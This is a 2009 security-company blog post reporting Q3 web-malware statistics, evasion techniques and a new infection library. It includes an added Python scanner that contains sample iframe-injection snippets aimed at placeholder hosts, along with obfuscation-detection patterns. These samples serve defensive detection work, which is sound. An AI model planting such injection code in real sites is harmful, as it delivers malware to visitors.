Tuesday, October 27, 2009

New Q3'09 malware data, and the Dasient Infection Library

Ed. Note: The data in this post is drawn primarily from Dasient's proprietary malware analysis platform, which gathers data on web-based malware attacks from across the web and in the last six months has been used to help tens of thousands of site owners address their web-based malware issues. This is the first in a series of regular reports on these trends.

As we've discussed in this space before, we are seeing a fundamental shift in how malware is being distributed: Attackers are focusing more than ever on compromising legitimate websites and using them to distribute malware. As a result, more and more sites are feeling the effects of web-based malware infection, which can include loss of traffic, decline in revenue, and damage to brand equity.

This trend is underlined by the data we've gathered on the third quarter of 2009, which saw significant activity on the web-based malware front. During that span, Dasient identified more than 52,000 web-based malware infections, making for a total of more than 72,000 unique malware infections identified and catalogued since our malware analysis platform launched.

Based on the telemetry data we've gathered from the web, we estimate that more than 640,000 sites and approximately 5.8 million pages were infected in the quarter. This is a substantial increase from data published by Microsoft in April 2009, which pegged the number of infected pages per quarter at a little more than 3 million. This increased activity is also reflected in the rapid growth of the blacklists maintained by search engines, browsers, and anti-virus software companies. The Google blacklist alone has more than doubled in the last year, and at certain points has been adding 40,000 new sites per week.

This shift has been accelerated by the fact that using legitimate sites as a delivery method enables attackers to infect large numbers of endpoints at once, and by the trend toward increasing complexity in and interoperability between websites and web applications (which is in turn opening up more and more attack surfaces).

Substantial portions of sites being infected

While it often takes only a couple of infected pages to harm users or land a site on one of the many blacklists, our research suggests that when sites are infected, the bad code is installed on a significant portion of the pages on those sites. In Q3'09, the infections on newly compromised sites of 10 pages or more spread to an average of 19% of those sites' pages.

This number is significant for a couple of reasons. For one, the greater the percentage of a site that's infected, the greater the chances are that the site will spread malware to users or be flagged by a blacklist provider. For another, modern web-based malware infections are frequently complex and heavily obfuscated, making it a challenge even for experienced webmasters to identify all the bad code on the site and remove it. The more infected pages there are on the site, the longer it can take to address the infection. And if the site has already been blacklisted (which is often the case), then the site will take a hit in traffic, reputation, and revenue with each day that passes during the cleanup and blacklist appeal process.

High reinfection rate

Another trend worth noting from Q3 is the high reinfection rate for sites, which came in at 39.6%. There are a number of factors that could contribute to a high reinfection rate, including the tendency for attackers to look for attack vectors common to large numbers of sites and then develop automated attack scripts that will repeatedly seek out those vectors and exploit them.

The sheer number of available attack vectors likely also plays a part. Common attack vectors include compromised FTP credentials, server-side vulnerabilities, unpatched or unknown web application vulnerabilities, and syndicated ad networks serving malicious ads. With attackers embracing scale and automation, and with so many ways for even well-secured sites to be compromised, it's becoming more and more important for site owners to employ tools that can help them regularly monitor their sites for infection and quickly address any issues that arise.

New attack techniques

As you can see in the graph below, the vast majority of the web-based malware attacks in Q3 could be classified as JavaScript (54.8%) and iFrame (37.1%) attacks, with "other" attacks accounting for only 8.1%.

One of the challenging things about trying to protect sites from the threat of web-based malware is that the attacks often evolve very quickly and make use of a number of obfuscation techniques to evade traditional malware scanners. We saw plenty of this activity in Q3, with some notable recent examples being dynamically generating the SRC attribute in iFrames to foil scanners that look at SRC attributes; using partially or fully encoded URLs to frustrate scanners that look for regular expressions; and adding phrases like "analytics-google" to malicious code to fool webmasters into thinking the code is legitimate.
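As an added illustration (not code from the original post or from Dasient), a scanner can normalize page source before matching so that the three evasions named above still surface. The regex heuristics, the allowlist approach, and the `example.invalid` sample pages are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote

# Illustrative heuristics (assumptions), not Dasient's detection logic.
URL = re.compile(r'https?://([a-z0-9.-]+)', re.I)
ESCAPES = re.compile(r'\\x([0-9a-f]{2})|\\u([0-9a-f]{4})', re.I)
FROMCHARCODE = re.compile(r'String\.fromCharCode\(([\d\s,]+)\)')
CONCAT = re.compile(r'["\']\s*\+\s*["\']')
DYNAMIC_IFRAME = re.compile(
    r'createElement\(\s*["\']iframe["\']\s*\)|document\.write\([^)]*<\s*iframe', re.I)
LOOKALIKE = re.compile(r'analytics-google', re.I)  # phrase named in the post

def normalize(text):
    """Undo percent-encoding, JS hex/unicode escapes, fromCharCode and string concatenation."""
    text = unquote(text)
    text = ESCAPES.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)
    text = FROMCHARCODE.sub(
        lambda m: '"%s"' % "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
        text)
    return CONCAT.sub("", text)

def is_allowed(host, allowed):
    return any(host == a or host.endswith("." + a) for a in allowed)

def scan(html, allowed):
    """Return (finding, detail) tuples for one page's HTML."""
    decoded = normalize(html)
    raw_hosts = {h.lower() for h in URL.findall(html)}
    findings = []
    for host in sorted({h.lower() for h in URL.findall(decoded)}):
        if not is_allowed(host, allowed):
            # A host visible only after decoding was hidden from a plain regex scan.
            findings.append(("external-url" if host in raw_hosts else "obfuscated-url", host))
    if DYNAMIC_IFRAME.search(decoded):
        findings.append(("dynamic-iframe", None))
    label = LOOKALIKE.search(decoded)
    if label:
        findings.append(("lookalike-label", label.group(0)))
    return findings

# Constructed sample pages; example.invalid hosts are placeholders.
ALLOWED = {"example.com", "google-analytics.com"}
CLEAN = '<script src="https://www.google-analytics.com/ga.js"></script>'
DYNAMIC = '''<script>/* analytics-google tracker */
var f = document.createElement("iframe");
f.src = "ht" + "tp://" + "stats.example.invalid/in.php";
document.body.appendChild(f);</script>'''
ENCODED = '<script>document.write(unescape("%3Ciframe src=%22http%3A//cdn.example.invalid/x%22%3E"))</script>'

if __name__ == "__main__":
    for name, page in [("clean", CLEAN), ("dynamic", DYNAMIC), ("encoded", ENCODED)]:
        print(name, scan(page, ALLOWED))
```

Static normalization only covers encodings it knows about; pages that assemble the URL at runtime from other data still need rendering or sandboxed execution to be caught.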

Dasient to open up web-based malware Infection Library

The Dasient Web-Anti Malware (WAM) service regularly monitors our customers' sites for signs of a web-based malware infection. When an infection is detected, it notifies the customer immediately, providing full diagnostic information on the infection. It can also automatically strip out the bad code from infected pages before they're served to the site's users -- keeping those users safe and keeping the site off the blacklist. We're proud to be able to provide this service to our customers, and have received great feedback since launching earlier this year.

But as the threat of web-based malware continues to grow, one of the things we're hearing from the web, security, and IT professionals we work with is that they need more information to help them keep track of the threat and ensure that they have the tools they need to address it. With that in mind, we will now start providing these professionals with a view into the Dasient Infection Library, which in just a few months has accumulated data on more than 70,000 different web-based malware infections.


To start, we'll be providing information on the top 10 web-based malware attacks for the week, as well as some other basic trend information on the latest attacks. We'll also be publishing relatively new infections that our platform finds to a dedicated Twitter feed. We hope to expand the view we offer into our Infection Library in the future, and are looking forward to your feedback on the kinds of data and functionality you'd find useful.

If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your business, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed at http://twitter.com/dasient for all the latest in web-based malware and general security news.


40 comments:

  1. The infection library would make a very useful Firefox plugin, wouldn't it?

    I know a ton of people that would use it profusely, and I bet it would drive a lot of traffic to your website.

    Excellent report, by the way. Thanks!

    Ruy

  2. Hello friends, I really liked this information. A few days ago I read something similar. I would like to receive updates on this issue, as it is very interesting. Thanks!
